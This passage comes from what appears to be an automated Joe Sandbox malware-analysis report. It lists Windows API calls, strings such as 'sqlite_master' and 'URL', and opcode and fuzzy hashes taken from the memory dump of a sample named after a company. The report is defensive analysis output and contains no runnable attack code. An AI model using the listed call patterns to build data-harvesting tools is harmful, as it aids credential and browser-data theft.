                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1127616056-0
                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: sqlite_master
                                                                                                    • API String ID: 438689982-3163232059
                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3917621476-0
                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 822687973-0
                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2678498856-0
                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item
                                                                                                    • String ID:
                                                                                                    • API String ID: 3888421826-0
                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3727323765-0
                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 764393265-0
                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 979780441-0
                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                    • String ID:
                                                                                                    • API String ID: 1386444988-0
                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                    • String ID: d=E
                                                                                                    • API String ID: 909852535-3703654223
                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1983396471-123907689
                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                    • String ID: URL
                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                    APIs
                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
